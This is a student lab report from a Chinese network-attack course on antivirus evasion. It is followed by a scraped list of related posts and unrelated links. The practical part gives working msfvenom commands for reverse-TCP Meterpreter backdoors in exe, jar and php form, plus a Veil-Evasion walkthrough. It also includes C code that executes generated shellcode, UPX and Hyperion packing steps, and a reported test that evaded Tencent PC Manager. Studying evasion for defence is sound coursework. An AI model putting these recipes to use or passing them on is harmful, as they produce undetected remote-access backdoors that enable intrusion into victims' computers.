2018-2019-2 网络对抗技术 20165324 Exp3:免杀原理与实践

免杀原理及基础问题回答

免杀

1. 一般是对恶意软件做处理,让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。
2. 要做好免杀,就时清楚杀毒软件(恶意软件检测工具)是如何工作的。AV(Anti-virus)是很大一个产业。其中主要的技术人员基本有编制恶意软件的经验。
3. 反过来也一样,了解了免杀的工具和技术,你也就具有了反制它的基础。

基础问题回答

  • 杀软是如何检测出恶意代码的?

    1. 基于特征码的检测
    2. 启发式恶意软件检测
    3. 基于行为的恶意软件检测
  • 免杀是做什么?
    1. 使用一些技术手段对恶意软件做处理,让它不被杀毒软件所检测。同时,免杀也是渗透测试中需要使用到的技术。
  • 免杀的基本方法有哪些?
    • 改变特征码

      1. 只有EXE——加壳(压缩壳 加密壳)
      2. 有shellcode(像Meterpreter)——利用encode进行编码
      3. 有源代码——用其他语言进行重写再编译
    • 改变行为
      • 通讯方

        1. 尽量使用反弹式连接
        2. 使用隧道技
        3. 加密通讯数据
      • 操作模式
        1. 基于内存操作
        2. 减少对系统的修改
        3. 加入混淆作用的正常功能代码
      • 非常规方法
      1. 使用一个有漏洞的应用当成后门,编写攻击代码集成到如MSF中。
      2. 使用社工类攻击,诱骗目标关闭AV软件。
      3. 纯手工打造一个恶意软件
  • 开启杀软能绝对防止电脑中恶意代码吗?
    • 不能,因为恶意代码一系列的隐藏或加密变换后杀软并不能察觉异常敏感信息。

课下实验

实验准备:

  • 获取IP地址:windows7系统IP地址为192.168.44.130、linux系统IP地址为192.168.44.128。

实验内容:

  1. 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧
  2. 任务二:通过组合应用各种技术实现恶意代码免杀
  3. 任务三:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

实验3.1.1 msf编码器的使用

生成exe文件
  • Msfvenom是Metasploit平台下用来编码payloads免杀的工具。
  • 缺点:解码部分以及模板固定都是病毒检测的关键处和薄弱点。
  • 下面我们用msf编码器对后门程序进行一次到多次的编码,并进行检测。
  • 一次编码使用命令:-e选择编码器,-b是payload中需要去除的字符,该命令中为了使'\x00'不出现在shellcode中,因为shellcode以'\x00'为结束符
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.44.128 LPORT=5324 -f exe > met-encoded.exe
  • 使用VirusTotal扫描结果如下

  • 十次编码使用命令:-i设置迭代次数
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.44.128 LPORT=5324 -f exe > met-encoded10.exe
  • 使用VirusTotal扫描结果如下:

  • 生成jar文件:
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.16.44.128 LPORT=5324 x> 20165324_backdoor.jar
  • 检测如下

  • 生成php文件:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.208.129 LPORT=5318 x> 20165324_backdoor.php
  • 检测如下

实验3.1.2 veil-evasion的使用

  • 命令行安装:sudo apt-get install veil-evasion
  • 使用详解:
    1. veil命令进入界面
    2. use evasion命令进入Evil-Evasion
    3. use c/meterpreter/rev_tcp.py命令进入配置界面
    4. set LHOST 192.168.44.128命令设置反弹连接IP(kaliIP )
    5. set LPORT 5324命令设置端口
    6. 输入generate生成文件,接着输入你想要playload的名字:veil_c_5324
    7. 保存路径为/var/lib/veil/output/compiled/veil_c_5324.exe
  • 安装

  • 检测如下

实验3.2:通过组合应用各种技术实现恶意代码免杀

  • 背景知识学习:

  • 加壳:加壳的全称应该是可执行程序资源压缩,压缩后的程序可以直接运行。

  • 加壳的另一种常用的方式是在二进制的程序中植入一段代码,在运行的时候优先取得程序的控制权,之后再把控制权交还给原始代码,这样做的目的是为了隐藏程序真正的OEP(入口点,防止被破解)。大多数病毒就是基于此原理。

  • 加壳的程序需要阻止外部程序或软件对加壳程序本身的反汇编分析或者动态分析,以达到保护壳内原始程序以及软件不被外部程序破坏,保证原始程序正常运行。

  • 这种技术也常用来保护软件版权,防止软件被破解。但对于病毒,加壳可以绕过一些杀毒软件的扫描,从而实现它作为病毒的一些入侵或破坏的一些特性。

  • MSF的编码器使用类似方法,对shellcode进行再编码。

  • 从技术上分壳分为:

    • 压缩壳:减少应用体积,如ASPack,UPX
    • 加密壳:版权保护,反跟踪。如ASProtect,Armadillo
    • 虚拟机:通过类似编译手段,将应用指令转换为自己设计的指令集。如VMProtect, Themida
  • 半手工注入Shellcode并执行,

    首先使用命令:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.44.128 LPORT=5324 -f c

用c语言生成一段shellcode;

  • 创建文件5324.c,将unsigned char buf[]赋值到其中,代码如下:
unsigned char buf[] = 生成的shellcode;

int main()
{
int (*func)() = (int(*)())buf;
func();
}
  • 使用命令i686-w64-mingw32-g++ 5324.c -o 5324.exe,编译为可执行文件5324.exe

  • 通过组合半手工制作shellcode,压缩壳,加密壳达到了免杀的目的.

  • 使用压缩壳(UPX),命令为:

upx xxx.exe -o xxx_upxed.exe

  • 使用加密壳(Hyperion)

    1. 将上一个生成的文件拷贝到/usr/share/windows-binaries/hyperion/目录中
    2. 进入目录/usr/share/windows-binaries/hyperion/
    3. 输入命令wine hyperion.exe -v 5324_upxed.exe 5324_upxed_hyperion.exe进行加壳
  • 对目标主机进行反弹攻击测试:(半手工生成的shellcode+压缩壳可直接实现,但半手工生成的shellcode+压缩壳+加密壳在目标主机上运行出错)

任务三:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

  • 对方电脑为windows7,腾讯电脑管家13.0.19837.233,按照任务二即可(只用压缩壳就可以通过检测了)

2018-2019-2 网络对抗技术 20165324 Exp3:免杀原理与实践的更多相关文章

  1. 2018-2019-2 20165315 《网络对抗技术》Exp3 免杀原理与实践

    2018-2019-2 20165315 <网络对抗技术>Exp3 免杀原理与实践 一.实验内容 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion ...

  2. 2018-2019-2 网络对抗技术 20165317 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165317 Exp3 免杀原理与实践 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用 ...

  3. 2018-2019-2 网络对抗技术 20165318 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165318 Exp3 免杀原理与实践 免杀原理及基础问题回答 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil- ...

  4. 2018-2019-2 网络对抗技术 20165232 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165232 Exp3 免杀原理与实践 免杀原理及基础问题回答 一.免杀原理 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中需要使用到的技术. ...

  5. 2018-2019-2 网络对抗技术 20165237 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165237 Exp3 免杀原理与实践 一.实践目标 1.1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳 ...

  6. 2018-2019-2 网络对抗技术 20165221 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165221 Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 主要依托三种恶意软件检测机制. 基于特征码的检测:一段特征码就是一段或者多 ...

  7. 2018-2019-2 网络对抗技术 20165325 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165325 Exp3 免杀原理与实践 实验内容(概要) 一.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己 ...

  8. 2018-2019-2 网络对抗技术 20165206 Exp3 免杀原理与实践

    - 2018-2019-2 网络对抗技术 20165206 Exp3 免杀原理与实践 - 实验任务 1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己 ...

  9. 2018-2019-3 网络对抗技术 20165235 Exp3 免杀原理与实践

    2018-2019-3 网络对抗技术 20165235 Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 1.对某个文件的特征码进行分析,(特征码就是一类恶意文件中经常出现的一段代 ...

  10. 2018-2019-2 网络对抗技术 20165311 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165311 Exp3 免杀原理与实践 免杀原理及基础问题回答 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil- ...

随机推荐

  1. spring MVC @Resource不支持Lazy加载

    今天迁一系统时发现有个bean使用@Resource注入了另外一个bean,这个被注入的bean是将被deprecated的类,而且只有一两个功能使用到,为了先调整进行测试,增加了@Lazy注解,启动 ...

  2. 《Linux内核分析》第六周 进程的描述与创建

    [刘蔚然 原创作品转载请注明出处 <Linux内核分析>MOOC课程http://mooc.study.163.com/course/USTC-1000029000] WEEK SIX(3 ...

  3. LIST-PROCESSING用法 ABAP任意时刻进行List输出_SAP

    如何在SAP的Screen中编写List报表 1.相关命令LEAVE TO LIST-PROCESSING [AND RETURN TO SCREEN <nnnn>].LEAVE LIST ...

  4. 百度云盘demo

  5. TCP状态转换图

    注意: connect函数导致当前套接字从CLOSE状态(该套接字自从由socket函数创建以来一直所处的状态)转移到SYN_SENT状态 若成功则再转移到ESTABLISHED状态, 若connec ...

  6. 【CTSC1999】【解救大兵瑞恩】

    44. [CTSC1999] 解救大兵瑞恩 ★★☆ 输入文件:rescue.in 输出文件:rescue.out 简单对照 时间限制:1 s 内存限制:128 MB 问题描写叙述 1944年,特种兵麦 ...

  7. 我的第一个webapiDemo

    最近在面试,总是被问到有没有接触过webapi 或者问webapi和MVC 的区别,今天看了看,原来如此,自己理解感觉webapi和webservice一样像是实现soa 的一种形式,也可以理解为服务 ...

  8. 如何选择 Apache Tomcat 与 JDK 版本

    Apache Tomcat Version

  9. windows系统下ruby开发环境的搭建方法

    ruby是一种简单快捷的面向对象的脚本语言,非常直观.下面说一下windows系统下ruby开发环境的搭建方法. 工具/原料 rubyinstaller.exe 方法/步骤 1 到如下网站去下载最新的 ...

  10. iOS 问答时间

    runloop 的 model作用是什么? 答案: model 主要是用来指定事件在运行循环中的优先级,分为: NSDefaultRunLoopMode(kCFRunLoopDefaultMode): ...